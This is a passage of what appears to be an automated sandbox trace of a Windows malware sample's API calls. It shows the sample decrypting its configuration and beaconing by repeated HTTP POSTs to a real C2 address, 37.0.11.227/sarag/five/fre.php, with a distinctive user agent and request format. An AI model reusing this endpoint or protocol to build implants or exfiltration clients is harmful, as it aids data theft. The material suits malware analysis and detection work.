lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 [0194.974] GetProcessHeap () returned 0x690000 [0194.974] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0194.974] GetProcessHeap () returned 0x690000 [0194.974] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b2fb8 [0194.975] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0194.975] wvsprintfA (in: param_1=0x6b2fb8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0194.976] GetProcessHeap () returned 0x690000 [0194.976] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6abd08 [0194.976] GetProcessHeap () returned 0x690000 [0194.976] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 [0194.976] send (s=0x3cc, buf=0x6abd08*, len=242, flags=0) returned 242 [0194.977] send (s=0x3cc, buf=0x6aba40*, len=159, flags=0) returned 159 [0194.977] GetProcessHeap () returned 0x690000 [0194.977] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0194.977] recv (in: s=0x3cc, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0195.036] GetProcessHeap () returned 0x690000 [0195.036] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0195.036] GetProcessHeap () returned 0x690000 [0195.037] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0195.038] GetProcessHeap () returned 0x690000 [0195.039] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afb00 | out: hHeap=0x690000) returned 1 [0195.041] GetProcessHeap () returned 0x690000 [0195.042] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aef68 | out: hHeap=0x690000) returned 1 [0195.042] closesocket (s=0x3cc) returned 0 [0195.043] GetProcessHeap () returned 0x690000 [0195.043] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab340 | out: hHeap=0x690000) returned 1 [0195.043] GetProcessHeap () returned 0x690000 [0195.044] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0195.044] GetProcessHeap () returned 0x690000 [0195.044] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0195.044] GetProcessHeap () returned 0x690000 [0195.044] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0195.045] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x115c) returned 0x3cc [0195.050] Sleep (dwMilliseconds=0xea60) [0195.052] GetProcessHeap () returned 0x690000 [0195.052] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a3fe0 [0195.052] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0195.053] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0195.061] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0195.062] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0195.073] GetProcessHeap () returned 0x690000 [0195.073] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0195.074] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0195.074] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0195.074] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0195.075] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0195.075] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0195.076] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0195.076] GetProcessHeap () returned 0x690000 [0195.076] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0195.077] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0195.077] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a3fe0, pdwDataLen=0x19fcfc | out: pbData=0x6a3fe0, pdwDataLen=0x19fcfc) returned 1 [0195.078] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0195.078] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0195.079] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0195.079] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0195.079] GetProcessHeap () returned 0x690000 [0195.079] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6abd08 [0195.080] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0195.080] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0195.085] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0195.085] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0195.086] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0195.086] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0195.087] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0195.088] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0195.088] GetProcessHeap () returned 0x690000 [0195.088] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0195.088] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0195.088] GetProcessHeap () returned 0x690000 [0195.088] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0195.088] GetProcessHeap () returned 0x690000 [0195.089] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0195.089] GetProcessHeap () returned 0x690000 [0195.089] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3fe0 | out: hHeap=0x690000) returned 1 [0195.089] GetProcessHeap () returned 0x690000 [0195.089] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0195.090] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0195.091] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0195.099] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0195.099] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aed48) returned 1 [0195.108] GetProcessHeap () returned 0x690000 [0195.108] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0195.109] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0195.109] CryptImportKey (in: hProv=0x6aed48, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d628) returned 1 [0195.110] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0195.110] CryptSetKeyParam (hKey=0x69d628, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0195.111] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0195.111] CryptSetKeyParam (hKey=0x69d628, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0195.111] GetProcessHeap () returned 0x690000 [0195.111] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0195.113] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0195.113] CryptDecrypt (in: hKey=0x69d628, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0195.114] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0195.114] CryptDestroyKey (hKey=0x69d628) returned 1 [0195.115] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0195.116] CryptReleaseContext (hProv=0x6aed48, dwFlags=0x0) returned 1 [0195.116] GetProcessHeap () returned 0x690000 [0195.116] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0195.117] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0195.117] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0195.118] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0195.119] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0195.119] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0195.119] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0195.120] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0195.121] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0195.121] GetProcessHeap () returned 0x690000 [0195.121] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f48 [0195.121] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6adb80*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6ae838*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0195.121] GetProcessHeap () returned 0x690000 [0195.121] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab380 [0195.121] socket (af=2, type=1, protocol=6) returned 0x3d0 [0195.121] connect (s=0x3d0, name=0x6ae838*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0195.152] FreeAddrInfoW (pAddrInfo=0x6adb80*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6ae838*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0195.152] GetProcessHeap () returned 0x690000 [0195.152] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0195.152] GetProcessHeap () returned 0x690000 [0195.152] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b2fb8 [0195.153] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0195.154] wvsprintfA (in: param_1=0x6b2fb8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0195.154] GetProcessHeap () returned 0x690000 [0195.154] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afbc0 [0195.154] GetProcessHeap () returned 0x690000 [0195.154] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 [0195.155] GetProcessHeap () returned 0x690000 [0195.155] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4340 [0195.155] GetProcessHeap () returned 0x690000 [0195.155] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b2fb8 [0195.155] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0195.156] wvsprintfA (in: param_1=0x6b2fb8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0195.156] GetProcessHeap () returned 0x690000 [0195.156] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6abd08 [0195.156] GetProcessHeap () returned 0x690000 [0195.157] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 [0195.157] send (s=0x3d0, buf=0x6abd08*, len=242, flags=0) returned 242 [0195.157] send (s=0x3d0, buf=0x6aba40*, len=159, flags=0) returned 159 [0195.158] GetProcessHeap () returned 0x690000 [0195.158] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0195.158] recv (in: s=0x3d0, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0195.241] GetProcessHeap () returned 0x690000 [0195.241] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0195.243] GetProcessHeap () returned 0x690000 [0195.244] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0195.244] GetProcessHeap () returned 0x690000 [0195.244] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afbc0 | out: hHeap=0x690000) returned 1 [0195.244] GetProcessHeap () returned 0x690000 [0195.245] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0195.245] closesocket (s=0x3d0) returned 0 [0195.246] GetProcessHeap () returned 0x690000 [0195.246] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab380 | out: hHeap=0x690000) returned 1 [0195.246] GetProcessHeap () returned 0x690000 [0195.246] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0195.246] GetProcessHeap () returned 0x690000 [0195.246] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0195.247] GetProcessHeap () returned 0x690000 [0195.247] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f48 | out: hHeap=0x690000) returned 1 [0195.247] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1170) returned 0x3d0 [0195.252] Sleep (dwMilliseconds=0xea60) [0195.253] GetProcessHeap () returned 0x690000 [0195.253] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0195.254] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0195.254] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0195.264] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0195.265] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0195.274] GetProcessHeap () returned 0x690000 [0195.274] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88e0 [0195.275] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0195.275] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a88e0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0195.276] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0195.276] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0195.277] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0195.277] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0195.277] GetProcessHeap () returned 0x690000 [0195.278] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88e0 | out: hHeap=0x690000) returned 1 [0195.279] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0195.279] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0195.284] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0195.284] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0195.285] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0195.285] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0195.285] GetProcessHeap () returned 0x690000 [0195.285] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0195.286] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0195.286] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0195.287] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0195.288] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0195.288] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0195.289] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0195.289] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0195.290] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0195.290] GetProcessHeap () returned 0x690000 [0195.290] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0195.290] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0195.290] GetProcessHeap () returned 0x690000 [0195.290] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0195.291] GetProcessHeap () returned 0x690000 [0195.291] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0195.291] GetProcessHeap () returned 0x690000 [0195.291] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0195.291] GetProcessHeap () returned 0x690000 [0195.291] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0195.292] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0195.292] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0195.298] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0195.298] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aed48) returned 1 [0195.305] GetProcessHeap () returned 0x690000 [0195.305] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0195.305] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0195.306] CryptImportKey (in: hProv=0x6aed48, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d628) returned 1 [0195.307] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0195.307] CryptSetKeyParam (hKey=0x69d628, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0195.308] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0195.308] CryptSetKeyParam (hKey=0x69d628, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0195.308] GetProcessHeap () returned 0x690000 [0195.308] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0195.309] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0195.309] CryptDecrypt (in: hKey=0x69d628, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0195.310] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0195.310] CryptDestroyKey (hKey=0x69d628) returned 1 [0195.311] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0195.312] CryptReleaseContext (hProv=0x6aed48, dwFlags=0x0) returned 1 [0195.312] GetProcessHeap () returned 0x690000 [0195.312] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0195.312] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0195.313] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0195.314] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0195.314] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0195.315] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0195.315] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0195.316] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0195.317] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0195.317] GetProcessHeap () returned 0x690000 [0195.317] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0195.317] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6ade00*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6ae910*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0195.317] GetProcessHeap () returned 0x690000 [0195.317] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab440 [0195.317] socket (af=2, type=1, protocol=6) returned 0x3d4 [0195.317] connect (s=0x3d4, name=0x6ae910*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0195.343] FreeAddrInfoW (pAddrInfo=0x6ade00*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6ae910*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0195.344] GetProcessHeap () returned 0x690000 [0195.344] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0195.344] GetProcessHeap () returned 0x690000 [0195.344] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b2fb8 [0195.344] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0195.346] wvsprintfA (in: param_1=0x6b2fb8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0195.346] GetProcessHeap () returned 0x690000 [0195.346] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af740 [0195.346] GetProcessHeap () returned 0x690000 [0195.346] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 [0195.347] GetProcessHeap () returned 0x690000 [0195.347] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0195.347] GetProcessHeap () returned 0x690000 [0195.347] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b2fb8 [0195.348] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0195.349] wvsprintfA (in: param_1=0x6b2fb8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0195.349] GetProcessHeap () returned 0x690000 [0195.349] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6abd08 [0195.349] GetProcessHeap () returned 0x690000 [0195.349] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 [0195.349] send (s=0x3d4, buf=0x6abd08*, len=242, flags=0) returned 242 [0195.350] send (s=0x3d4, 